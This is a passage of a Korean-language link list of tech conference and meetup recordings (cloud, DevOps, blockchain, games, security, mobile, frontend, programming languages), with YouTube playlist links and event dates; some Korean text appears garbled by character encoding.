[2021](https://www.youtube.com/playlist?list=PL7yPwpDiPFlIoiBPrX3fQk6XT-UrE-wRt) | [2022](https://www.youtube.com/playlist?list=PL7yPwpDiPFlJrLWUDjhzoHsrZo_7qwYZT) | [2023](https://www.youtube.com/playlist?list=PL7yPwpDiPFlIIWxRwsDJ5oc1yjNFqSFzB) - 2023.10.14 - ๋น…๋ฐ์ดํ„ฐ ์—ฐํ•ฉ๋™์•„๋ฆฌ [๋ณด์•„์ฆˆ(BOAZ)](https://www.facebook.com/BOAZbigdata) - [์ œ 11ํšŒ](https://www.youtube.com/playlist?list=PLThNmt_l7b6DodqJiUNa8LgjT1B6vt4NC) | [์ œ 12ํšŒ](https://www.youtube.com/playlist?list=PLThNmt_l7b6CqH3cDSJQjMVBKQRuORwTW) | [์ œ 13ํšŒ](https://www.youtube.com/playlist?list=PLThNmt_l7b6Bd_5lMozoy8e10XZb7DaKl) | [์ œ 14ํšŒ](https://www.youtube.com/playlist?list=PLThNmt_l7b6Aa1t7GBv7xotMv1btzq-2U) | [์ œ 15ํšŒ](https://www.youtube.com/playlist?list=PLThNmt_l7b6A1K4qS4lf9hYd-hg0svRmU) | [์ œ 16ํšŒ](https://www.youtube.com/playlist?list=PLThNmt_l7b6AEacVgZVcpMxUlWHlXGFor) | [์ œ 17ํšŒ](https://www.youtube.com/playlist?list=PLThNmt_l7b6Db4-HPgTWW5JJnTrNvmoQS) | [์ œ 18ํšŒ](https://www.youtube.com/playlist?list=PLThNmt_l7b6Abvmao-_XKqXMSUUocwSY6) | [์ œ 19ํšŒ](https://www.youtube.com/@bigdataboaz4452/videos) - 2024.01.27 - MLOps Korea - [2021 MLOps KR 1st community](https://www.youtube.com/playlist?list=PLIuC6QlQQF0Pf-aM0tioYTjrnLzaJaGez) - 2021.06.05 ## ํด๋ผ์šฐ๋“œ - ๋„ค์ด๋ฒ„ ํด๋ผ์šฐ๋“œ ํ”Œ๋žซํผ(NCP) - NAVER Cloud SUMMIT - [2021](https://www.youtube.com/playlist?list=PLpywxIpxgxhFb9wCdCuiiU6WcWzGFR6c5) | [2022](https://www.youtube.com/playlist?list=PLpywxIpxgxhGY6IJW17IW8-eEHmvWa5FK) - 2022.12.14 - ์ปจํผ๋Ÿฐ์Šค - [๊ฒŒ์ž„ 2021](https://www.youtube.com/playlist?list=PLpywxIpxgxhHK1dGhSMCeebkNshm_Pvkz) | [์ œ์กฐ 2021](https://www.youtube.com/playlist?list=PLpywxIpxgxhHkyuYUHEU2gTVbw1_hjxgd) | [๊ธˆ์œต 2023](https://www.youtube.com/playlist?list=PLpywxIpxgxhFe71pLAwddPMOeMI4zgnGj) - 2023.10.25 - [ํ…Œํฌ๋ฐ‹์—…](https://www.youtube.com/playlist?list=PLpywxIpxgxhGpqHTbyiUAV5ZX_xDYkRWK) - 2022.04.20 - [์˜จ๋ผ์ธ ๊ต์œก](https://www.youtube.com/playlist?list=PLpywxIpxgxhHmVzdtULIaYwzFKjc41TVr) - 2023.03.15 - NHN - NHN [FORWARD](https://forward.nhn.com) - [2020](https://www.youtube.com/playlist?list=PL42XJKPNDepZbqM9N11RxL5UY_5PbA_Wo) | [2021](https://www.youtube.com/playlist?list=PL42XJKPNDepZC5HXlqxzTTJ_Ai_KDcXRa) | [2022](https://www.youtube.com/playlist?list=PL42XJKPNDepYXyKefvicxlA2fz1aThVs5) - 2022.11.24 - NHN [Cloud make IT](https://makeit.nhncloud.com) - [2022](https://www.youtube.com/playlist?list=PL42XJKPNDepZLj8ZtktFJ6MsF4IdhcQB0) | [2023](https://www.youtube.com/playlist?list=PL42XJKPNDepbuujKpiCqYk3oF3VeBZjI8) - 2023.06.22 - NHN [Cloud On](https://www.youtube.com/playlist?list=PL42XJKPNDepbXNAIIhWrgiD7gSFCuqyRa) - 2023.10.31 - kt cloud - kt cloud : summit - [2023](https://www.youtube.com/playlist?list=PLaRqSfWeygEfdb6csw41l5R2pDd4RZgOm) | [2024](https://www.youtube.com/playlist?list=PLaRqSfWeygEeR4jeZjzmeiKsQ7pLU8q3G) - 2024.05.02 - [Monthly Webinar](https://www.youtube.com/playlist?list=PLaRqSfWeygEd1iiAaOsfn39VlrTkNMoi1) - 2024.04.25 - ๋ฉ”๊ฐ€์กด - [๋””์ง€ํ„ธ ๋‹ค์นดํฌ](https://www.megazone.com/application_form_digitaldacapo2022-apply-220208) - [2022](https://www.youtube.com/playlist?list=PLxTkO33QtxTICeek2PbVPW_zbwZXV0hCe) | [2023](https://www.youtube.com/playlist?list=PLxTkO33QtxTJPzx9GtsJvVdfARm7Af_k7) - 2023.01.10 - AWS [๋ฆฌ์†Œ์Šค ํ—ˆ๋ธŒ](https://kr-resources.awscloud.com) - AWS re:Invent [2021 ํ•œ๊ตญ์–ด ํŠธ๋ž™](https://www.youtube.com/playlist?list=PLORxAVAC5fUW40w3WpbSbACrHZqhoQmG6) | [2023 ํ•œ๊ตญ์–ด ๊ฐ•์—ฐ](https://www.youtube.com/playlist?list=PLORxAVAC5fUW40w3WpbSbACrHZqhoQmG6) | re:Cap [2020](https://www.youtube.com/playlist?list=PLORxAVAC5fUXzLlNAXGA1HUG2HFgR5T_Q) | [2021](https://www.youtube.com/playlist?list=PLORxAVAC5fUX9IHNx3Zhzfq-cSF-F2H8I) | [2022 Daily Recap](https://www.youtube.com/playlist?list=PLORxAVAC5fUUmumUj0Q4JaraT6WNMbfuO) - 2023.11.27~12.01 - AWS Summit Online Korea [2020](https://www.youtube.com/playlist?list=PLORxAVAC5fUWAd4oEEXU-PSb4LELpPA82) | [2021](https://www.youtube.com/playlist?list=PLORxAVAC5fUW7yw8e0olxjf11Qv010Jz-) | [2022](https://www.youtube.com/playlist?list=PLORxAVAC5fUX7j65Uvp9xAi1hMS6M-2P1) | [2023](https://www.youtube.com/playlist?list=PLORxAVAC5fUVLujXBa2aXPjaMLAM4XNr3) - 2023.05.03~04 - AWS Summit Seoul [2023](https://www.youtube.com/playlist?list=PLORxAVAC5fUVLujXBa2aXPjaMLAM4XNr3) - 2023.05.03~04 - AWS Innovate 2021 - [AI/ML](https://www.youtube.com/playlist?list=PLORxAVAC5fUWUC-lXkou_8oobUArafWE_), [Data](https://www.youtube.com/playlist?list=PLORxAVAC5fUW3stiOQeXwidbOvbm8xYbB), [์•ฑํ˜„๋Œ€ํ™”](https://www.youtube.com/playlist?list=PLORxAVAC5fUUFPs8yy-fvYwI6zYSD-by2) | 2022 - [AI/ML](https://www.youtube.com/playlist?list=PLORxAVAC5fUVqyzPFUXdNnD8k1KYRDbwI), [Data](https://www.youtube.com/playlist?list=PLORxAVAC5fUVlqCYPgAzccuKUcmLinrnh), [์•ฑํ˜„๋Œ€ํ™”](https://www.youtube.com/playlist?list=PLORxAVAC5fUXJUUqptRtyDasuklx3SCmX), [For Every App](https://www.youtube.com/playlist?list=PLORxAVAC5fUXIsBWZ4F7Vhx7RnAwszKdb) | 2023 - [AI/ML](https://www.youtube.com/playlist?list=PLORxAVAC5fUWkmf6r2ZfGSC1m4rhyfJMO) - 2023.02.22 - AWS Builders ์˜จ๋ผ์ธ ์‹œ๋ฆฌ์ฆˆ [2021](https://www.youtube.com/playlist?list=PLORxAVAC5fUWPziIFAho12lvGl1hR7ZZ5) | [2022](https://www.youtube.com/playlist?list=PLORxAVAC5fUX_OlbTijMFcH3iYfdCJrqc) | [2023](https://www.youtube.com/playlist?list=PLORxAVAC5fUU7cywJX6ilucVIhxwwfxei) - 2023.01.18 - AWS Startup Week [2023](https://www.youtube.com/playlist?list=PLORxAVAC5fUViBsvUeiG8vEPGWHmTnehN) | [Unicorn Day 2024](https://www.youtube.com/playlist?list=PLORxAVAC5fUV6iiTsRWrk0NOIpEn8k5gE) - 2024.03.20 - Games on AWS [2022](https://www.youtube.com/playlist?list=PLORxAVAC5fUXJK1tgrWEmwgWIZWSqNoGj) | [2023](https://www.youtube.com/playlist?list=PLORxAVAC5fUXTApC8pivE7UXpx-QmESLq) - 2023.10.24 - ์˜ค๋ผํด [ํด๋ผ์šฐ๋“œ ์‚ฌ์šฉ์ž ๊ทธ๋ฃน](https://www.facebook.com/groups/koreaoraclecloud) - [Oracle Database World - Korea](https://youtu.be/zynSuLI1Aa8?list=PL_lN0QYuCPSF5XyXrvWthJdjRtu37XTTu) - 2022.07.21 - [๋””๋ฒจ๋กœํผ (DEV)](https://www.youtube.com/playlist?list=PL_lN0QYuCPSGzA9TmINzKP61R0p40DX29) - 2024.04.24 - [Oracle Cloud Summit 2024](https://youtu.be/4nnjKMdcnyo?list=PL_lN0QYuCPSGOIK7v2r6TQ_DYdwa8j1Sp) - 2024.01.25 - Google [Cloud Summit](https://cloudonair.withgoogle.com/events/summit-korea-livestream) - [Google Cloud Summit Seoul '19](https://www.youtube.com/playlist?list=PLBgogxgQVM9tS7Yhzjc3Wt56jc5j-z_4C) - 2019.11.06 - ํ•œ๊ตญ๋งˆ์ดํฌ๋กœ์†Œํ”„ํŠธ - [Microsoft Startup Summit 2023](https://www.youtube.com/playlist?list=PLGh_JNxzXsX9NSm-iyAdS4Ioco0vp4jtq) - 2023.10.26 - Azure [Everywhere 2021](https://www.youtube.com/playlist?list=PLGh_JNxzXsX_YkjiqSwDRbEnVOk_vNV0D) | 2022 - [Azure](https://www.youtube.com/playlist?list=PLGh_JNxzXsX-Wu_DN4C6A8EzsI9DLiZHK), [Dev](https://www.youtube.com/playlist?list=PLGh_JNxzXsX9va2yAFrGNBYKAfHNg463b), [Security](https://www.youtube.com/playlist?list=PLGh_JNxzXsX_eHsDpyRV5rJbWb8nrHezV), [Modern Work](https://www.youtube.com/playlist?list=PLGh_JNxzXsX9RxStNUDma-7-cnq4q9oFm) - 2022.04.06~27 - [ํ•œ๊ตญ Azure ์‚ฌ์šฉ์ž ๊ทธ๋ฃน](https://www.facebook.com/groups/krazure) - [GAV2020KR](https://www.youtube.com/playlist?list=PLFbmOoKZ852WRZkFql8Gv1U-CNX_WRHen) | [Global Azure 2021 Korea](https://www.youtube.com/playlist?list=PLFbmOoKZ852XZ41ODzJqlzB-8sq7VQt0j) - 2021.04.24 - [Kubernetes Korea Group](https://www.facebook.com/groups/k8skr) - Kubernetes Community Day [KCD Korea 2021](https://www.youtube.com/playlist?list=PL1j_IgwZkt4Mgj7OKf1SHjgAp2UQtey_I) | [2023](https://www.youtube.com/playlist?list=PL1j_IgwZkt4PIWBHTlGr9UDmJTpGjU59C) - 2023.07.03 - Cloud Native Community Groups [CNCG Seoul 2020](https://www.youtube.com/playlist?list=PL1j_IgwZkt4Pug8dpF7yWT5ba-qGybUgN) - 2020.10.29 - ๊ธฐํƒ€ - ์‰์–ด๋“œIT - [ํด๋ผ์šฐ๋“œ ์ธํ”„๋ผ ์ปจํผ๋Ÿฐ์Šค](https://youtu.be/NW6oywF_pGM?list=PLyPtqY7T1lotU8fInOfnSuRYxNgLcoahO) - 2022.07.26 - ๊ณผํ•™๊ธฐ์ˆ ์ •๋ณดํ†ต์‹ ๋ถ€ - Open Cloud Platform Summit - [2022](https://www.youtube.com/playlist?list=PL-AoIAa-OgNnym3kkTmIlko53smWH4L0p) | [2023](https://www.youtube.com/playlist?list=PL-AoIAa-OgNla-rPexcg9WpEntQ9fPKDD) - 2023.07.12 - ์Šค๋งˆํŠธํด๋ผ์šฐ๋“œ์‡ผ2021 - [1์ผ์ฐจ](https://youtu.be/Y335QzGRz1U) | [2์ผ์ฐจ](https://youtu.be/Itk2Wy3oiKE) - 2021.09.28~29 - ์ง€ํ‹ฐํ”Œ๋Ÿฌ์Šค - Get Tech Day [2021](https://www.youtube.com/playlist?list=PLM48rFX5FOnbMQyAZZIGItYhax_B9REC8) | [2022](https://www.youtube.com/playlist?list=PLM48rFX5FOnYZVXnxF49sBtCJCLkDCDo3) - 2022.12.15 ## ์ธํ”„๋ผ & ๋ฐ๋ธŒ์˜ต์Šค - ์˜คํ”ˆ ์ธํ”„๋ผ ์ปค๋ฎค๋‹ˆํ‹ฐ - OpenInfra Community Days Korea - [2020](https://www.youtube.com/playlist?list=PLkgLtPJ7Lg3rLLET-H1fS12OF0bBtOE-p) | [2021](https://www.youtube.com/playlist?list=PLkgLtPJ7Lg3o6FZNJiB10vReh_iXve6LS) | [2023](https://www.youtube.com/playlist?list=PLkgLtPJ7Lg3pIbzuNxOix9Co5pHgAU98a) - 2023.07.03~04 - [OpenInfra & Cloud Native Days Korea 2022](https://www.youtube.com/playlist?list=PLkgLtPJ7Lg3rnn_p6QV-GVdgqL-ZgZnZo) - 2022.11.01 - KAFKA ํ•œ๊ตญ ์‚ฌ์šฉ์ž ๋ชจ์ž„ [KRU](https://www.facebook.com/groups/kafka.kru) - Virtual Meetup [2020](https://www.youtube.com/playlist?list=PLUc8G1CJwNG2nJgOqRESbI64C0cWU9-nx) | [2021](https://www.youtube.com/playlist?list=PLUc8G1CJwNG3E3_q6nY2_xM9jjHx0t7bw) | [2022](https://www.youtube.com/playlist?list=PLUc8G1CJwNG3ipaXxW25_a_bTVn3yM69g) - 2022.04.14 - Datadog Korea - [Virtual Summit 2020](https://www.youtube.com/playlist?list=PLtoDdE_CaqrQVY5iuha4xGMK6smnLfgi4) | [DASH 2023](https://www.youtube.com/playlist?list=PLtoDdE_CaqrT9r7VwpELbzl6acIuxzc3w) | [Observability Day 2023](https://www.youtube.com/playlist?list=PLtoDdE_CaqrS55NBKZ4ds0jbF0foKone9) - 2023.10.13 - [Datadog ์›จ๋น„๋‚˜ ์‹œ๋ฆฌ์ฆˆ](https://www.youtube.com/playlist?list=PLtoDdE_CaqrR9hMYN40ms_4_k_rNz0ro2) - 2024.02.02 - ๋‹น๊ทผ๋งˆ์ผ“ - ๋‹น๊ทผ SRE ๋ฐ‹์—… - [1ํšŒ](https://www.youtube.com/playlist?list=PLaHcMRg2hoBqWWla-pCBSRqU-jSriiZHj) | [2ํšŒ](https://www.youtube.com/playlist?list=PLaHcMRg2hoBqJRSlnE7Xw_QpVkf8u6ISH) | [3ํšŒ](https://www.youtube.com/playlist?list=PLaHcMRg2hoBopbyEOW1XjP3runE93n9GC) - 2023.06.15 - ๋‹น๊ทผ SERVER ๋ฐ‹์—… - [1ํšŒ](https://www.youtube.com/playlist?list=PLaHcMRg2hoBr5s_jn5CzZrpkmHOY0N8w7) | [2ํšŒ](https://www.youtube.com/playlist?list=PLaHcMRg2hoBp2ukW-b4yzcNzNLZ5j7nmh) - 2023.10.28 - ๋‹น๊ทผ ML ๋ฐ‹์—… - [1ํšŒ](https://www.youtube.com/playlist?list=PLaHcMRg2hoBqSQM48ospyb9hQTzzvMF4y) - 2024.05.10 - ํ•˜์ดํผ์ปค๋„ฅํŠธ - [HyperLink DevOps & SRE Meetup](https://www.youtube.com/playlist?list=PL1DMLLaNeMxa8Rq0aGcrJ-j3nTSWP7vfE) - 2022.03.02 - HashCorp - HashiCorp Strategy Day [2023](https://www.youtube.com/playlist?list=PL81sUbsFNc5ZkHno0jkNtQJgWdlY_xpG7) - 2023.04.11 - HashiTalks [Korea 2022, 2023](https://www.youtube.com/playlist?list=PL81sUbsFNc5aQFJNIh74lRJtav5TfjANB) - 2023.09.07 ## ๋ธ”๋ก์ฒด์ธ - ์—…๋น„ํŠธ - [UDC](https://udc.upbit.com/) - [2020](https://www.youtube.com/playlist?list=PLyONEtYCZLWXsfYZJlp4r5doQflsIEYcZ) | [2021](https://www.youtube.com/playlist?list=PLyONEtYCZLWU7nxtYgVxNJVgtTnFFeQ77) | [2022](https://www.youtube.com/playlist?list=PLyONEtYCZLWXqxJ3IbXz3PJ8Uc3ZHkmP6) | [2023](https://www.youtube.com/playlist?list=PLyONEtYCZLWWAct203e-Dm1_fC3Ebgu65) - 2023.11.13 - [DCON 2023](https://www.youtube.com/playlist?list=PLjziuUtwQOz1n1GLizGeUOquf5rNdZAlx) - 2023.03.16 - ๋žŒ๋‹ค256 - Luniverse - [2021](https://www.youtube.com/playlist?list=PLXDdGRMRFqmGRS82o4fGBpXFlHANdPRmn) | [2022](https://www.youtube.com/playlist?list=PLXDdGRMRFqmGaJV8N--ofWmE_tiW7creV) - 2022.04.12 - ํ•œ๊ตญ์ธํ„ฐ๋„ท์ง„ํฅ์› - ๋ธ”๋ก์ฒด์ธ ๋ฐ‹์—… ์ปจํผ๋Ÿฐ์Šค - [2022](https://www.youtube.com/playlist?list=PLiagZi75rsoZBPHOtg-ASJOkx3meCG_c-) | [2023](https://www.youtube.com/playlist?list=PLiagZi75rsoZ4keCGjZdvafP_WmZChvOr) - 2023.04.05 - ๊ธฐํƒ€ - ํ…ŒํฌM - [ํ…ŒํฌB ์ฝ˜ํผ๋Ÿฐ์Šค](https://www.youtube.com/playlist?list=PLpCs8R7ZoTIDp8zRwOzk3gKRQIueOSeDc) - 2022.08.18 - ๊นŒํŽ˜24 - [NFT ํ™œ์šฉ ์ด์ปค๋จธ์Šค ์„ฑ๊ณต์ „๋žต ์›จ๋น„๋‚˜](https://youtu.be/KM1-kqSAw3c) - 2022.12.15 ## ๋ชจ๋นŒ๋ฆฌํ‹ฐ - ํ˜„๋Œ€์ž๋™์ฐจ - [HMG Developer Conference](https://www.hmgdevcon.com) - [์ œ1ํšŒ](https://www.youtube.com/playlist?list=PLypFzBtJUO_jOcX48cwJ21pFpzkkWLqWm) | [์ œ2ํšŒ](https://www.youtube.com/playlist?list=PLypFzBtJUO_gRRauzZOhH9TexiYmrYcyX) | [์ œ3ํšŒ](https://www.youtube.com/playlist?list=PLypFzBtJUO_gDlP0xkac4kXAaGcr_w31w) - 2023.11.13 - Softeer Tech Meet-up - [1st, 2nd](https://www.youtube.com/playlist?list=PLypFzBtJUO_gRY3U3XPjutaUDskzKP_tv) - 2023.09.14 - ์นด์นด์˜ค๋ชจ๋นŒ๋ฆฌํ‹ฐ - [MEMO](https://nemo.kakaomobility.com) - [2022](https://www.youtube.com/playlist?list=PLAi6ak51pSz2O8W4VPsKsUQ_X4oVcvfz6) | [2023](https://www.youtube.com/playlist?list=PLAi6ak51pSz0F7I22FkxYZfs856ZNYX97) - 2023.09.08 ## ๊ฒŒ์ž„ - ๋„ฅ์Šจ - [NDC](https://ndc.nexon.com) - [2021](http://ndcreplay.nexon.com/#c=NDC2021) | [22](https://ndc.nexon.com/session/sessionDay1) - 2022.06.08~10 - ์œ ๋‹ˆํ‹ฐ ์ฝ”๋ฆฌ์•„ - [์œ ๋‚˜์ดํŠธ ์„œ์šธ 2020](https://www.youtube.com/playlist?list=PL412Ym60h6ush2X5_8B8LbKXaBSjIFopd) | [UNITE 2022](https://www.youtube.com/playlist?list=PL412Ym60h6uudM6ziOyy2Eb8KsARTZsmi) | [UNITE 2023](https://www.youtube.com/playlist?list=PL412Ym60h6utvkxkA2zlBIvDhtNLLUPKT) - 2023.11.30 - [Unity Wave 2022](https://www.youtube.com/playlist?list=PL412Ym60h6uskscz6NE7X7KjihUic7YtU) - 2022.05.09~13 ## ๋ณด์•ˆ - Samsung Research - [SSTF(Samsung Security Tech Forum)](https://research.samsung.com/sstf) - [2021](https://www.youtube.com/playlist?list=PLhpbZcOKxtO1eA3dVfatqd5bpwbGd0oXP) | [2022](https://www.youtube.com/playlist?list=PLhpbZcOKxtO0MkZ88h_y0Xs8VH2rFigWc) | [2023](https://www.youtube.com/playlist?list=PL7PfK8Mp1rLHT5-tkJtHrz0jCCQ_300tb) - 2023.08.22 - ์†Œํ”„ํŠธ์›จ์–ด ๊ฐœ๋ฐœ๋ณด์•ˆ ์ปจํผ๋Ÿฐ์Šค - [์ œ11ํšŒ(2021), ์ œ12ํšŒ(2022), ์ œ13ํšŒ(2023) ์†Œํ”„ํŠธ์›จ์–ด ๊ฐœ๋ฐœ๋ณด์•ˆ ์ปจํผ๋Ÿฐ์Šค](https://www.youtube.com/playlist?list=PLlFyHGHMXJU_p_288gCexBvV6tYtMtDBz) - 2023.11.14 - ์‹œํ๋ ˆ์ด์–ด - ๊ฐœ๋ฐœ์ž ์ปจํผ๋Ÿฐ์Šค STICK [2022](https://www.youtube.com/playlist?list=PL2JstscjHCud5oW7F3PZ5UJOrqFdbBhD1) | [2023](https://www.youtube.com/playlist?list=PL2JstscjHCueZR9css8YRXB81kKIkx8Iq) - 2023.11.01 - ๋ฐ์ผ๋ฆฌ์‹œํ - [PASCON](https://www.dailysecu.com/form/register.html?form_id=1639447124) - [2020](https://www.youtube.com/playlist?list=PLVzhBRBZvsfMQKMRlU4eotmXgPPxPhxoJ) | [2021](https://www.youtube.com/hashtag/pascon2021) | [2022](https://www.youtube.com/playlist?list=PLVzhBRBZvsfNceqznSO5GlkYrUkOrIrxX) | [2023](https://www.youtube.com/playlist?list=PLVzhBRBZvsfPcPeMevubEODj30J_STwHJ) - 2023.09.05 - G-PRIVACY [2023](https://www.youtube.com/playlist?list=PLVzhBRBZvsfOtpSy2LxIaZM7q8-o4ePMm) | [2024](https://www.youtube.com/playlist?list=PLVzhBRBZvsfP17wTtDtyigcT8imLIk9hU) - 2024.03.12 - ์•ˆ๋žฉ(AhnLab) - ISF - [2020](https://youtu.be/lbu_fD36ex4?list=PLcETc5mLmNrXk7QFkcY5y-9OL_DoCA7Kt) | [2021](https://youtu.be/rHyFZn5fMrQ?list=PLcETc5mLmNrXk7QFkcY5y-9OL_DoCA7Kt) | [2022](https://youtu.be/F3lt03ZBADg?list=PLcETc5mLmNrXk7QFkcY5y-9OL_DoCA7Kt) | [2023](https://www.youtube.com/playlist?list=PLcETc5mLmNrUOXF2H9BrTewvI5polNOl6) - 2023.09.07 - ์ฝ”๋“œ์—”์ง„ - CodeEngn Conference - [2021](https://www.youtube.com/playlist?list=PLscYqoBID5Z4G_YQKUGP_ZioNF7BNCKdX) | [2022](https://www.youtube.com/playlist?list=PLscYqoBID5Z5XYI_eC_FoNOxTegKuKoR2) | [2023](https://www.youtube.com/playlist?list=PLscYqoBID5Z4ZmgDyuAApOyDKkA0u8Cqv) - 2023.07.03 ## ๋ชจ๋ฐ”์ผ - ๊ตฌ๊ธ€ ๊ฐœ๋ฐœ์ž ๊ทธ๋ฃน(GDG) - I/O Extended Korea Android [2021](https://youtu.be/NIGV-NUf1pQ) | [2022](https://youtu.be/1TsQ0buZUas) - 2022.06.11 - ๋“œ๋กœ์ด๋“œ๋‚˜์ด์ธ  - [2020](https://www.youtube.com/playlist?list=PLu8dnNjU2Fmtg2gML0DVXakykl3NaWLZy) | [2021](https://www.youtube.com/playlist?list=PLu8dnNjU2FmsROfv5pNAvhRiOFVN_EmnV) | [2023](https://www.youtube.com/playlist?list=PLu8dnNjU2Fmv55B8y6Mw78pZFflIoxDo8) - 2023.09.12 - Async Swift Korea - [SyncSwift 2022](https://www.youtube.com/playlist?list=PLu5z3LShQlQXuZKlehlTfGZFc753dkgOs) - 2022.11.12 - AsyncSwift Seminar [001](https://www.youtube.com/playlist?list=PLu5z3LShQlQURqEqfYc-IfedIq8afW-mc), [002](https://youtu.be/46l90qYNHCc?t=1215) - 2022.09.22 - Seoul iOS Meetup - 2023 - [April](https://www.youtube.com/playlist?list=PLAFxr8OPgeVFdySPXGq8Nv37HfFcYM0ro), [May](https://www.youtube.com/playlist?list=PLAFxr8OPgeVF18jds65HTjzTQEbuVeq1A), [June](https://www.youtube.com/playlist?list=PLAFxr8OPgeVFxT5Vp_OVKBr-bgeyyVN-V), [July](https://www.youtube.com/playlist?list=PLAFxr8OPgeVEIC_uoQc07lGbRJ-kI5DNO), [August](https://youtu.be/22GjhyFqEcE?list=PLAFxr8OPgeVHiv1RO78GHNxvoDTjRRsNt&t=2), [October](https://youtu.be/1DkOCVeX26s?list=PLAFxr8OPgeVHF5i7kLXuNvJsadfPmwYU6), [December](https://youtu.be/0Q0leVjH2gM?list=PLAFxr8OPgeVGrG3efpsyWtWbnYcWJQdf1) - 2023.12.14 - 2024 - [January](https://youtu.be/FmYf5Yz77wg?list=PLAFxr8OPgeVF_SAt2o7lOe2UVJXb7yzg-) - 2024.01.18 - adiOS Korea - adiOS 2021 - [Oct](https://www.youtube.com/playlist?list=PLUsr11byBStFxL1J6wvflz_xyoiD2OeW9), [Dec](https://www.youtube.com/watch?v=hOEsIUa7-1M) | 2022 - [Blossom](https://www.youtube.com/playlist?list=PLUsr11byBStFUV0VHQEHBZA2XS0K-I9F7), [Intro](https://www.youtube.com/playlist?list=PLUsr11byBStEAiW2zHCqpGXvT6U5iMjfH), [ASAP๐Ÿฅ„](https://www.youtube.com/playlist?list=PLUsr11byBStGovDXPQ4EcTi0Q4dst1Hei), [Something](https://www.youtube.com/playlist?list=PLUsr11byBStFIg-hhapmB6nuj0dgJQjJ6) - 2022.12.18 - ๊ธฐํƒ€ - IMQA > [IMDEV 2023](https://www.youtube.com/playlist?list=PLmTSJ8F4eG5EUbh2Y4zcaiXZoNgLQoRyK) - 2023.02.20~21 ## ํ”„๋ก ํŠธ์—”๋“œ & JS - ํ”„๋ก ํŠธ์—”๋“œ ๊ฐœ๋ฐœ์ž ์ปจํผ๋Ÿฐ์Šค - FECONF 2020 - [A Track](https://www.youtube.com/playlist?list=PLZl3coZhX98q_yvsIzo0exOGSdmWeT_o6), [B Track](https://www.youtube.com/playlist?list=PLZl3coZhX98rqCYUOqO0Wbkas1hM1hlS2) | 2021 - [A Track](https://www.youtube.com/playlist?list=PLZl3coZhX98p6gwel6QW86QUwuAmTEZBo), [B Track](https://www.youtube.com/playlist?list=PLZl3coZhX98qv9ixNHWYkUOnwnW8xXvqD) | 2022 - [A Track](https://www.youtube.com/playlist?list=PLZl3coZhX98pajnfobtWKCU9XH3zNNT-v), [B Track](https://www.youtube.com/playlist?list=PLZl3coZhX98pl7L0FZW2XMg7fE3nZAJk3) | 2023 - [A Track](https://www.youtube.com/playlist?list=PLZl3coZhX98p5lWeGKAdUgA93bioesqjc), [B Track](https://www.youtube.com/playlist?list=PLZl3coZhX98rM8yercTFaikRkBJf8rfKJ) - 2023.10.21 - ์ž๋ฐ”์Šคํฌ๋ฆฝํŠธ ์ปจํผ๋Ÿฐ์Šค - [JSConf Korea](https://jsconf.kr) - [2020 Home Edition](https://www.youtube.com/playlist?list=PL37ZVnwpeshHlUonQ2pnYFd8SAiicjmlm) | [2022](https://www.youtube.com/playlist?list=PL37ZVnwpeshH7y4tbeYslJ5MN1JvyYEks) - 2022.09.16~17 - ๊ธฐํƒ€ - Nest.js Korea - [NestJS ๋ฐ‹์—…](https://www.youtube.com/@nestjskorea/videos) - 2023.06.15 ## ํ”„๋กœ๊ทธ๋ž˜๋ฐ ์–ธ์–ด - ํŒŒ์ด์ฝ˜ ํ•œ๊ตญ - [PyCon.KR](https://pycon.kr) - [2020](https://www.youtube.com/playlist?list=PLZPhyNeJvHRk9wIL9rZekFLIfT3aVcHT7) | [2021](https://www.youtube.com/c/PyConKRtube/videos?view=0&sort=dd&shelf_id=0) | [2022](https://www.youtube.com/playlist?list=PLZPhyNeJvHRnlqQwMj-WNlrsac7yTiVhk) | [2023](https://www.youtube.com/playlist?list=PLZPhyNeJvHRllQiXsJAryqWmqWrwFxY8I) - 2023.08.12~13 - ํ•œ๊ตญ ์Šคํ”„๋ง ์‚ฌ์šฉ์ž ๋ชจ์ž„ - [KSUG](https://www.ksug.org) - [2021 Webinar](https://www.youtube.com/playlist?list=PLn0dGEB80JNQLm7-af9X6Yqx1oBK8YXSm) - 2021.04.30 - SpringCamp - [2019](https://www.youtube.com/playlist?list=PLdHtZnJh1KdaM0AfxPA7qGK1UuvhpvffL) | [2023](https://www.youtube.com/playlist?list=PLdHtZnJh1KdbR9xXyiVJ-BClLTXCw66y3) - 2023.04.22 - Golang Korea - GopherCon Korea - [2021](https://www.youtube.com/playlist?list=PL2ntRZ1ySWBfulCVQD6EaU8c-GM56aUU7) | [2022](https://www.youtube.com/playlist?list=PL2ntRZ1ySWBfiSJSt-zPRbVSMDfK0EwQC) | 2023 [Day1](https://youtu.be/WZthMW0BaNA?t=1322) [Day2](https://youtu.be/8AUVKh0qJgU?t=1333) - 2023.08.05~06 - [2020.05 ์˜จ๋ผ์ธ ๋ฐ‹์—…](https://www.youtube.com/playlist?list=PLxEDm5GRSh4OJPiKKv5PVKiDi6f80kyTS) | [2022.03 Go 1.18 ๋ฆด๋ฆฌ์ฆˆํŒŒํ‹ฐ](https://www.youtube.com/playlist?list=PLxEDm5GRSh4P6aihX1DrNsV57r7bi0rZT) - 2022.03.31 - ๋‹ท๋„ท ๊ฐœ๋ฐœ์ž ์ปค๋ฎค๋‹ˆํ‹ฐ [๋‹ท๋„ท๋ฐ๋ธŒ](https://www.dotnetconf.kr) - .NET Conf - [2021](https://www.youtube.com/playlist?list=PLFVJi7gR5oaOtgZYZ4d77HcyjhcQ9iW4z) | [2022 x Seoul](https://www.youtube.com/playlist?list=PLFVJi7gR5oaPwyL4bR0vL4pwVDf321443) | [2023 x Seoul](https://www.youtube.com/playlist?list=PLFVJi7gR5oaOaTF5bMD0m_7ms9rfmndX4) | [2024 x Seoul](https://www.youtube.com/playlist?list=PLFVJi7gR5oaNapfx69uag1Z6KePIbHGfA) - 2024.02.21 - .NET Conf Mini - [21.04](https://www.youtube.com/playlist?list=PLFVJi7gR5oaMfdN1Q7rqFKa7ZWeW9O6k6), [21.08](https://www.youtube.com/playlist?list=PLFVJi7gR5oaOZVfHgT3IPQvk5uW2nzK3e) | [22.05](https://youtu.be/W95lo-337Q8), [22.09](https://youtu.be/Z6Z3qgHYaOg) | [L!VE 2023 Fall](https://www.youtube.com/playlist?list=PLFVJi7gR5oaPdlmQk0TjxxLyD7ND9Ws-g) - 2023.10.19 - Flutter Korea - [Flutter Festival Korea](https://www.youtube.com/playlist?list=PL6RQwUkx6VTSK_jxZUIh7usPE8JLpnaoS) - 2022.03.05 - [Flutter 